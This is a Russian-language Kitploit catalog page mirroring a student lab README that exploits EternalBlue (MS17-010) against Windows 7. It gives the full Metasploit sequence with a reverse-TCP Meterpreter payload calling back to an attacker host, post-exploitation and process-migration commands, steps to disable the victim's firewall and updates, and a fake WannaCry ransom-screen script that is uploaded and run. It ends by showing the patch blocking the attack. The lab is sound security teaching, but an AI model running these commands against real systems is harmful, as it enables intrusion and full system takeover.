Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
EternalBlue-Exploit-Demonstration — Учебная лаборатория, демонстрирующая эксплуатацию EternalBlue (MS17-010) против Windows 7 с использованием Metasploit, включая пост-эксплуатацию, симуляцию программы-вымогателя WannaCry и применение патча для устранения уязвимости в изолированной среде. | Kitploit
Инструменты/GitHubGitHub/dannic145/eternalblue-exploit-demonstration
Фреймворки для эксплойтовГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияПост-эксплуатацияАнализ вредоносных программCTFТестирование на ПроникновениеОбучение и Образование
Red Teaming
Лаборатории и Практика
GitHubdannic145/eternalblue-exploit-demonstration

EternalBlue-Exploit-Demonstration

Учебная лаборатория, демонстрирующая эксплуатацию EternalBlue (MS17-010) против Windows 7 с использованием Metasploit, включая пост-эксплуатацию, симуляцию программы-вымогателя WannaCry и применение патча для устранения уязвимости в изолированной среде.

Репозиторий
54 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Демонстрация эксплуатации EternalBlue (MS17-010)

Кибербезопасность-лабораторная работа, демонстрирующая эксплуатацию CVE-2017-0144 (EternalBlue) с использованием Metasploit против уязвимой системы Windows 7 и получение доступа уровня SYSTEM через Meterpreter.

Этот проект также имитирует атаку программы-вымогателя в стиле WannaCry (БЕЗОПАСНАЯ ДЕМО) и демонстрирует смягчение последствий с помощью обновления безопасности MS17-010.


Информация о модуле

Модуль: CSCM828 Уязвимости безопасности и тестирование на проникновение

Студенты:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

Университет: Университет Суонси


Ресурсы и загрузки

  1. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (Обновление безопасности Windows 7 x64)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (Загрузка виртуальных машин)
    https://www.kali.org/get-kali/#kali-virtual-machines

Windows 7 SP1 Home Premium English x64 (ISO)

https://archive.org/details/windows-7-home-prem-english
  • VMware Workstation Pro 17.6.4
    https://www.vmware.com/products/desktop-hyper


  • 1. Обзор

    Эта лабораторная работа демонстрирует:

    • Удалённую эксплуатацию уязвимости SMB (MS17-010)
    • Доступ на уровне ядра через EternalBlue
    • Установление сеанса Meterpreter
    • Методы пост-эксплуатации
    • Имитацию программы-вымогателя в стиле WannaCry (безопасно)
    • Смягчение последствий с помощью установки обновлений

    2. Лабораторная среда

    Требования

    • VMware Workstation / VirtualBox
    • Минимум 8 ГБ ОЗУ

    Атакующая машина

    • Kali Linux
    • Metasploit Framework

    Машина-жертва

    • Windows 7 SP1 x64 (без обновлений)

    Сеть

    • Только хост / NAT (изолированная среда)
    • Убедитесь, что обе машины могут взаимодействовать

    ⚠️ Эта лабораторная работа должна проводиться в полностью изолированной среде.


    3. Настройка жертвы (Windows 7)

    Выполните в командной строке от имени администратора:

    Отключить брандмауэр

    root@kitploit:~
    netsh advfirewall set allprofiles state off
    

    Проверить порт SMB

    root@kitploit:~
    netstat -an | findstr :445
    

    Отключить обновления (для стабильности лабораторной работы)

    root@kitploit:~
    sc stop wuauserv
    sc config wuauserv start= disabled
    

    4. Настройка атакующего (Kali Linux)

    Проверка связности

    root@kitploit:~
    ping <victim-ip>
    nmap -p 445 <victim-ip>
    

    5. Шаги эксплуатации

    Шаг 1: Сканирование цели

    root@kitploit:~
    nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>
    

    Ожидаемый результат:

    • Хост УЯЗВИМ (VULNERABLE)

    Шаг 2: Запуск эксплойта

    root@kitploit:~
    msfconsole
    use exploit/windows/smb/ms17_010_eternalblue
    set RHOSTS <victim-ip>
    set LHOST <attacker-ip>
    set PAYLOAD windows/x64/meterpreter/reverse_tcp
    run
    

    Шаг 3: Подтверждение доступа

    root@kitploit:~
    meterpreter > getuid
    

    Ожидаемый результат:

    root@kitploit:~
    NT AUTHORITY\SYSTEM
    

    6. Пост-эксплуатация

    root@kitploit:~
    sysinfo
    getuid
    ps
    screenshot
    shell
    whoami
    ipconfig
    

    Стабильная миграция

    root@kitploit:~
    ps
    migrate <explorer.exe PID>
    

    7. Имитация WannaCry (БЕЗОПАСНАЯ ДЕМО)

    Создание полезной нагрузки (Kali)

    root@kitploit:~
    cat > /tmp/wannacry64.bat << 'EOF'
    @echo off
    title WannaCryptor Demo - SAFE SIMULATION
    color 0a
    mode con: cols=80 lines=25
    cls
    
    setlocal enabledelayedexpansion
    
    set id=%random%-%random%-%random%
    set /a timeleft=60
    
    :main
    cls
    echo ========================================================
    echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
    echo ========================================================
    echo.
    echo  All files have been encrypted!
    echo.
    echo  Send 0.25 BTC to:
    echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
    echo.
    echo  Personal ID: %id%
    echo.
    echo  Time remaining: !timeleft! seconds
    echo.
    echo ========================================================
    echo.
    
    echo Initializing encryption...
    timeout /t 2 >nul
    
    for /l %%i in (1,1,20) do (
        set /a percent=%%i*5
        call :progress !percent!
        timeout /t 1 >nul
    )
    
    goto countdown
    
    :progress
    set bar=
    set /a blocks=%1/5
    for /l %%b in (1,1,!blocks!) do set bar=!bar!#
    cls
    echo ========================================================
    echo           ENCRYPTING FILES...
    echo ========================================================
    echo.
    echo Progress: [%bar%] %1%%
    echo.
    
    set /a randfile=%random% %% 5
    if !randfile!==0 echo Encrypting: documents.docx
    if !randfile!==1 echo Encrypting: photos.jpg
    if !randfile!==2 echo Encrypting: database.sql
    if !randfile!==3 echo Encrypting: backup.zip
    if !randfile!==4 echo Encrypting: project.pptx
    
    exit /b
    
    :countdown
    cls
    
    :loop
    cls
    echo ========================================================
    echo           YOUR FILES ARE ENCRYPTED
    echo ========================================================
    echo.
    echo  Pay within the time limit or files will be lost!
    echo.
    echo  Time remaining: !timeleft! seconds
    echo.
    echo ========================================================
    echo.
    
    if !timeleft! LEQ 0 goto end
    
    set /a timeleft-=1
    timeout /t 1 >nul
    goto loop
    
    :end
    cls
    echo ========================================================
    echo              TIME EXPIRED
    echo ========================================================
    echo.
    echo  Your files are permanently locked.
    echo.
    echo  (This was a SAFE DEMO simulation)
    echo.
    echo ========================================================
    pause
    EOF
    

    Загрузка и запуск

    root@kitploit:~
    meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
    meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"
    

    8. Смягчение последствий (демонстрация установки обновления)

    Шаг 1: Загрузка обновления

    • Посетите: https://www.catalog.update.microsoft.com/
    • Найдите: KB4012212 Windows 7 x64
    • Загрузите файл .msu

    Шаг 2: Установка обновления

    root@kitploit:~
    wusa.exe KB4012212-x64.msu /quiet /norestart
    

    Шаг 3: Перезагрузка

    root@kitploit:~
    shutdown /r /t 0
    

    Шаг 4: Проверка установки обновления

    root@kitploit:~
    systeminfo | findstr KB4012212
    

    Шаг 5: Повторный запуск эксплойта

    Ожидаемый результат:

    • Эксплойт не срабатывает
    • Нет сеанса Meterpreter

    Шаг 6: Проверка с помощью Nmap

    root@kitploit:~
    nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>
    

    Ожидаемый результат:

    • НЕ УЯЗВИМ (NOT VULNERABLE)

    9. Устранение неполадок

    ПроблемаРешение
    Эксплойт не срабатываетПроверьте связность
    Нет сеансаОтключите брандмауэр
    Сеанс завершаетсяПовторите попытку эксплойта
    Не видно окнаВыполните миграцию в explorer.exe

    10. Этические соображения

    Этот проект выполняется:

    • Только на контролируемых лабораторных машинах
    • В полностью изолированной сети
    • Только в образовательных целях

    Несанкционированное использование нарушает:

    • Закон Великобритании о неправомерном использовании компьютеров 1990 года (UK Computer Misuse Act 1990)

    11. Заключение

    Эта лабораторная работа демонстрирует:

    • Реальную эксплуатацию уязвимости SMB с помощью EternalBlue
    • Компрометацию Windows 7 на уровне SYSTEM
    • Имитацию атаки программы-вымогателя (безопасно)
    • Важность своевременной установки обновлений
    Скачать инструмент